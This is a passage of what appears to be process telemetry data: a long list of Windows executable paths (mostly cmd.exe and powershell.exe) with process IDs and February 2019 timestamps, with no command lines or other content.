00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x2368|2019-02-10 00:45:12.290000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x6f8|2019-02-10 00:45:12.540000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x205c|2019-02-10 00:45:11.067000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x2080|2019-02-10 00:50:52.073000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1be0|2019-02-10 00:52:08.250000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x108c|2019-02-10 00:52:09.043000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1928|2019-02-10 00:55:31.747000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x12f8|2019-02-10 00:55:32.533000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1368|2019-02-10 00:50:52.277000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1124|2019-02-10 00:44:47.240000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x23d8|2019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x23d8|2019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x23d8|2019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x23d8|2019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x23d8|2019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x23d8|2019-02-09 21:44:46.737000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0xd60|2019-02-09 21:56:45.653000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x1588|2019-02-09 21:56:46.413000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0xcac|2019-02-09 21:56:28.237000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe|0x1770|2019-02-10 01:48:41.643000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe|0x53c|2019-02-10 03:06:45.883000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x16e8|2019-02-10 03:45:32.930000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x212c|2019-02-10 03:45:33.703000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x21b0|2019-02-10 03:47:36.837000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe|0x1f7c|2019-02-10 03:48:48.320000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x2274|2019-02-10 03:48:49.100000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x494|2019-02-10 03:47:37.640000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe|0x11dc|2019-02-10 03:44:47.243000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe|0x1454|2019-02-10 04:08:29.150000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe|0x1454|2019-02-10 04:08:29.150000\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe|0x1844|2019-02-10 04:08:35.177000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe|0x1ef4|2019-02-10 04:32:15.793000\",\"c:\\\\windows\\\\system32\\\\svchost.exe|0xb3c|1970-01-01 